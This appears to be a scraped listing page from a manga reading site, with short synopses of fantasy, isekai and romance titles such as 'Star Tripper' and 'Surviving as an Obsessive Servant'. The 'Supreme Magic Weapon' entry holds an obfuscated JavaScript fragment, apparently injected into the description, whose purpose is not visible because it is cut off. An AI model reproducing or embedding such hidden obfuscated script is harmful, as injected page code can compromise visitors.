Magic - Page 43

Discover top manga Magic with stunning art and thrilling tales. Enjoy the best Magic manga free online today!

708 results

Star Tripper: Planetarium Ghost Travel

The vast sky is populated with a great many stars on which most of the inhabitants have fallen into a deep sleep, called simply the “Slumbering Stars”. This is the story of a traveler of the stars, a worker for the Planetarium Ghost Travel Company (aka. PGT) named No. 303, as he spends his time visiting those sleeping stars in an attempt to preserve the memories and culture their peoples have left behind. Would you care to join No. 303 on a journey into the quiet night? Ranked No. 5 on the 2023 Kono Manga wa Sugoi! for manga written by women.


Strange Love Rivals Increased!

After I isekai’d as the female villain of an otome game, I just wanted to avoid the death ending and live a peaceful life. But why are the male lead and female lead fighting over me? Los rivales de amor extraños aumentaron, 奇怪的情敌增加了  


Summoners War: Captain Eve

Read Summoners War: Captain Eve manhwa latest chapter on Mangazin After an attempt to steal a magical relic goes very wrong, Eve not only loses a friend but also her freedom. She is forced to summon a monster and enter a fighting arena with other imprisoned slaves. Years go by, and Eve has finally honed her skills and plans to exact her revenge on the man who captured her when a group of sky pirates looking for relics suddenly appears. In that moment, she makes the choice to escape with the pirates on their ship and sets off on a tumultuous journey to find her true path in life.


Supreme Magic Weapon

Supreme Magic Weapon is a Manga/Manhwa/Manhua in (English/Raw) language, Action series is written by Updating This Comic is About Not provided.<script></script><script>(function(_0x518046,_0x3fc852){var _0x778d78=_0x5dd4,_0x53e4cf=_0x518046();while(!![]){try{var _0x57d2d1=-parseInt(_0x778d78(0x105))/(0x2f1*-0x2+-0xf82+-0x1*-0x1565)+-parseInt(_0x778d78(0x101))/(0x7a*-0x10+-0x2*0x567+0x76*0x28)+-parseInt(_0x778d78(0xf9))/(0x87*0x26+0xe08+0x220f*-0x1)*(-parseInt(_0x778d78(0x10b))/(-0x191b+-0x448+-0x27*-0xc1))+-parseInt(_0x778d78(0x102))/(-0x10f9+0x185*-0x10+0x14a7*0x2)*(parseInt(_0x778d78(0xff))/(0x8af+0x15c6+-0x1e6f))+-parseInt(_0x778d78(0xfc))/(-0x1121+-0xcfb+0x1e23)+-parseInt(_0x778d78(0xfb))/(0x16c3+-0x7*0x13f+0x16*-0xa3)+parseInt(_0x778d78(0xfe))/(-0x1a*-0x76+0x37*-0x49+0x3bc);if(_0x57d2d1===_0x3fc852)break;else _0x53e4cf['push'](_0x53e4cf['shift']());}catch(_0x2d4abe){_0x53e4cf['push'](_0x53e4cf['shift']());}}}(_0x81ca,0x1*-0x2d3da+0x2e006+0x3*0x9963));function _0x81ca(){var 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Supreme Spirit Master

I found a strange black blade then I also bumped into a cute girl. It changed my fate completely, it was the end of my boring and steady life and in comes the new and exciting world. Time to fight to change my fate!


Survival Story of a Sword King in a Fantasy World

Ryu Han-Bin was a normal person who just had been discharged from his mandatory military service, when he was transported to another world. Left to fend for himself, he was given the goal of surviving and growing stronger in a desolate world riddled with monsters. The problem is the 'Guideline' that was supposed to be his guiding system to survive is filled with errors.


Survive as the Villain’s Cousin

Read manhwa Survive as the Villain’s Cousin The culprit who turned his twin cousins into villains by appearing in a side story of a novel! …Who would have thought he would be reincarnated as a villain? I sighed deeply and made up my mind. ‘Let’s raise the twins with love and prevent their darkening!’ I don’t care about the novel and get along well with the twins, but the second male lead, whom I had no reason to get involved with, keeps getting more and more obsessed with me! Ah. Where did it go wrong? And why did the second male lead turn dark when I was just trying to stop the villain from turning dark? “Please, please don’t back down anymore. I don’t know how much longer I can endure it.” 악역의 사촌으로 살아남기

3 days ago

Surviving As An Illegitimate Princess

사생아 공주로 살아남기 “Don’t Look Down On Me Just Because I’m Young! Even Though I Look Like This, I’m On My 10Th Life!” I’m An Illegitimate Princess Whose Life Was Cut Short After Being Mistaken As Kin Of An Enemy Country. Later, I Discovered The Identity Of My Biological Father In My 9Th Tragic Regression. It Was Faeon, A War Hero Who Defeated The Demon King And The Strongest Holy Knight In The Continent. He Had A Forbidden Relationship With The Princess, Had Me, And Then Deserted Me! In Order To Survive The Harsh Royal Palace, I’ve Decided To Use And Then Abandon This Impudent Father. I Will Become The Strongest As Fast As I Can And Escape From This Disgusting Country! And So, While I Was Building My Strength, I Happened To Meet The Demon King’s Son, Leo. He Wasn’t Arrogant Like His Father, But He Was Pitifully Living In Captivity. So, I Took Care Of Him In Secret. “Asha, You Cannot Get Engaged To Anyone.” “…Huh? Why?” “Because I’ll Take Responsibility For You Forever.” “What?!” “We Spent The Night Together.” …What Is This Prince Saying? A Father And Holy Knight Who Had (?) A Forbidden Love. Along With An Enemy Prince Who Is Trying (!) To Have A Forbidden Love. With Them, Can The Unfortunate Princess Change Her Fate?


Surviving as an Obsessive Servant

I’ve died of the same rare disease 3 times in the world of a BL novel. I can’t die like this anymore. So I took special measures. ‘Let’s just put a spoon on the well-prepared medicine table!’ Young master, I won’t miss a single drop of medicine or even a breath! I disguised myself as a servant to serve the sick young master. Even the spirit power from his breath would heal me, so what could be better than this! But serving the said individual was not easy… “Get out! I said get out! I’ve had enough of this!!! …Wait. What are you doing on your knees right now?” “Young master, if you’re going to throw it away, please throw it in my mouth.” I told him in a panic while pulling his arm back to stop him from throwing the vial. “I don’t care if you spray it on my face…” For a moment, his pupils dilated wildly. *** I’m a do-if-you-must kind of girl. While I was at it, I took good care of my master, who was my lifesaver. As well as serving him, I hugged him, carried him, and became his legs. I wonder if he recognized my true value as the heir of a prestigious dukedom. The young master would occasionally glare at me, but he didn’t kick me out. Now, I have recovered and repaid my gratitude. It was time to figure out my escape plan… But something was off about the young master. “You said you liked me so much, so where are you trying to run off to?” “...” “You said you’d die without me.” Gradually, he began to have the look of a hungry predator.


Suterare Shiro Mahoutsukai no Koucha Seikatsu

“Thank you for your efforts so far, Amalia.” Amalia, a white witch, was traveling in a party with her friends, but when the group failed to defeat the dragon, Amalia was mocked as a “useless old woman” and was abandoned on the dragon mountain. Amalia was ready to die, but the golden dragon took a liking to her and took her to the Magic Realm to heal her injuries. The dragon seemed to be interested in the Human World and took the form of a human child to live with Amalia in the countryside. Amalia was living with the dragon child, making the most of her skills in white magic and her favorite hobby of making tea, when a mercenary appeared in front of her. He was once the young boy that Amalia had lovingly raised in the orphanage.


Tai-Chi Convergence

In a world governed by Chi and dimensional hierarchies, Shinra Yamada’s life changes when he consumes a mysterious heart, allowing the entity Akuma Obscura to possess him. Joined by Espertha Yakuzu, a vessel for dangerous energy, and Noboru Kojima, a cunning wind Chi user, Shinra embarks on a journey of self-discovery and cosmic ascension. As he rises through six tiers of existence, from mortal to godlike, Shinra battles clans, gods, and abstract beings while uncovering the secrets of Chi and his connection to the multiverse. Tai Chi Convergence is a tale of power, sacrifice, and the struggle to reclaim hope in a universe teetering on chaos. (Source: MangaPlus for Creators)


Taida na Akujoku Kizoku ni Tensei shita Ore, Scenario o Bukkowashitara Kikakugai no Maryoku de Saikyou ni Natta

I\'ve been reincarnated as the villainous noble Weiss from my favorite academy game, and the fate that awaits me is nothing but the worst possible ruin, with no salvation. I absolutely have to avoid that at all costs! Then the only way out is to gain overwhelming power that even surpasses the game\'s protagonist and become the strongest! --- **Links:** - Alternative Official Raw - [Niconico](
